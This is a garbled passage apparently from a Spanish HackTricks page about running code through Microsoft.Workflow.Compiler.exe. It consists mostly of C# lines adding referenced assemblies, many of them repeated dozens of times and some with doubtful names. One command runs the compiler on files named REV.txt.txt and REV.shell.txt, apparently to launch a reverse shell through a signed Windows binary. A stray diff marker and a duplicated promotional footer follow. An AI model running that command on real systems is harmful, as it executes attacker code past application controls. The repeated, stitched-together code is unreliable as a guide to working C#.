parameters.ReferencedAssemblies.Add("System.WorkflowServices.dll");
parameters.ReferencedAssemblies.Add("System.DirectoryServices.dll");
parameters.ReferencedAssemblies.Add("System.DirectoryServices.AccountManagement.dll");
parameters.ReferencedAssemblies.Add("System.DirectoryServices.Protocols.dll");
parameters.ReferencedAssemblies.Add("System.EnterpriseServices.dll");
parameters.ReferencedAssemblies.Add("System.EnterpriseServices.Thunk.dll");
parameters.ReferencedAssemblies.Add("System.Transactions.dll");
parameters.ReferencedAssemblies.Add("System.Data.OracleClient.dll");
parameters.ReferencedAssemblies.Add("System.Data.SqlClient.dll");
parameters.ReferencedAssemblies.Add("System.Data.SqlServerCe.dll");
parameters.ReferencedAssemblies.Add("System.Data.SqlXml.dll");
parameters.ReferencedAssemblies.Add("System.Data.Entity.dll");
parameters.ReferencedAssemblies.Add("System.Data.Linq.dll");
parameters.ReferencedAssemblies.Add("System.Data.Linq.Design.dll");
parameters.ReferencedAssemblies.Add("System.Data.Services.Client.dll");
parameters.ReferencedAssemblies.Add("System.Data.Services.Design.dll");
parameters.ReferencedAssemblies.Add("System.Web.dll");
parameters.ReferencedAssemblies.Add("System.Web.Abstractions.dll");
parameters.ReferencedAssemblies.Add("System.Web.ApplicationServices.dll");
parameters.ReferencedAssemblies.Add("System.Web.DynamicData.dll");
parameters.ReferencedAssemblies.Add("System.Web.DynamicData.Design.dll");
parameters.ReferencedAssemblies.Add("System.Web.Entity.dll");
parameters.ReferencedAssemblies.Add("System.Web.Entity.Design.dll");
parameters.ReferencedAssemblies.Add("System.Web.Extensions.dll");
parameters.ReferencedAssemblies.Add("System.Web.Mobile.dll");
parameters.ReferencedAssemblies.Add("System.Web.RegularExpressions.dll");
parameters.ReferencedAssemblies.Add("System.Web.Routing.dll");
parameters.ReferencedAssemblies.Add("System.Web.Services.dll");
parameters.ReferencedAssemblies.Add("System.Web.WebPages.dll");
parameters.ReferencedAssemblies.Add("System.Web.WebPages.Deployment.dll");
parameters.ReferencedAssemblies.Add("System.Web.WebPages.Razor.dll");
parameters.ReferencedAssemblies.Add("System.Web.WebPages.Administration.dll");
parameters.ReferencedAssemblies.Add("System.Web.WebPages.Data.dll");
parameters.ReferencedAssemblies.Add("System.Web.WebPages.Design.dll");
parameters.ReferencedAssemblies.Add("System.Web.WebPages.Deployment.dll");
parameters.ReferencedAssemblies.Add("System.Web.WebPages.Razor.dll");
parameters.ReferencedAssemblies.Add("System.Web.WebPages.Administration.dll");
parameters.ReferencedAssemblies.Add("System.Web.WebPages.Data.dll");
parameters.ReferencedAssemblies.Add("System.Web.WebPages.Design.dll");
parameters.ReferencedAssemblies.Add("System.Web.WebSockets.dll");
parameters.ReferencedAssemblies.Add("System.Windows.dll");
parameters.ReferencedAssemblies.Add("System.Windows.Input.Manipulations.dll");
parameters.ReferencedAssemblies.Add("System.Windows.Presentation.dll");
parameters.ReferencedAssemblies.Add("System.Windows.Controls.dll");
parameters.ReferencedAssemblies.Add("System.Windows.Controls.Ribbon.dll");
parameters.ReferencedAssemblies.Add("System.Windows.Forms.DataVisualization.dll");
parameters.ReferencedAssemblies.Add("System.Windows.Forms.Design.Editors.dll");
parameters.ReferencedAssemblies.Add("System.Windows.Forms.Design.dll");
parameters.ReferencedAssemblies.Add("System.Windows.Forms.Ribbon.dll");
parameters.ReferencedAssemblies.Add("System.Windows.Forms.Ribbon.Design.dll");
parameters.ReferencedAssemblies.Add("System.Windows.Input.Manipulations.dll");
parameters.ReferencedAssemblies.Add("System.Windows.Presentation.dll");
parameters.ReferencedAssemblies.Add("System.Windows.Controls.dll");
parameters.ReferencedAssemblies.Add("System.Windows.Controls.Ribbon.dll");
parameters.ReferencedAssemblies.Add("System.Windows.Forms.DataVisualization.dll");
parameters.ReferencedAssemblies.Add("System.Windows.Forms.Design.Editors.dll");
parameters.ReferencedAssemblies.Add("System.Windows.Forms.Design.dll");
parameters.ReferencedAssemblies.Add("System.Windows.Forms.Ribbon.dll");
parameters.ReferencedAssemblies.Add("System.Windows.Forms.Ribbon.Design.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Hosting.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.Design.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.Design.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.Design.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.Design.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.Design.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.Design.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.Design.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.Design.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.Design.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.Design.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.Design.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.Design.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.Design.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.Design.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.Design.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.Design.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.Design.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.Design.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.Design.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.Design.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.Design.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.Design.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.Design.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.Design.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.Design.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.Design.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.Design.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.Design.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.Design.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.Design.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.Design.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.Design.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.Design.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.Design.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.Design.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.Design.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.Design.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.Design.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.Design.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.Design.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.Design.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.Design.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.Design.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.Design.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.Design.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.Design.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.Design.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.Design.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.Design.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.Design.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.Design.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.Design.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.Design.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.Design.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.Design.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.Design.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.Design.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.Design.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.Design.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.Design.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.Design.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.Design.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.Design.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.Design.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.Design.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.Design.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.Design.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.Design.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.Design.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.Design.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.Design.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.Design.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.Design.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.Design.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.Design.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.dll");
parameters.ReferencedAssemblies.Add("System.Xaml.Rx.Design.dll");
```
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt.txt REV.shell.txt
```
@ -569,10 +830,10 @@ https://github.com/praetorian-code/vulcan
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* ¿Trabajas en una **empresa de ciberseguridad**? ¿Quieres ver tu **empresa anunciada en HackTricks**? ¿O quieres tener acceso a la **última versión de PEASS o descargar HackTricks en PDF**? ¡Revisa los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
* ¿Trabajas en una **empresa de ciberseguridad**? ¿Quieres ver tu **empresa anunciada en HackTricks**? ¿O quieres tener acceso a la **última versión de PEASS o descargar HackTricks en PDF**? ¡Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
* Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Obtén el [**swag oficial de PEASS y HackTricks**](https://peass.creator-spring.com)
* **Únete al** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **sígueme** en **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Comparte tus trucos de hacking enviando PRs al** [**repositorio de hacktricks**](https://github.com/carlospolop/hacktricks) **y al** [**repositorio de hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
* **Únete al** [**💬**](https://emojipedia.org/speech-balloon/) **grupo de Discord** o al [**grupo de telegram**](https://t.me/peass) o **sígueme en** **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Comparte tus trucos de hacking enviando PR al** [**repositorio de hacktricks**](https://github.com/carlospolop/hacktricks) **y al** [**repositorio de hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>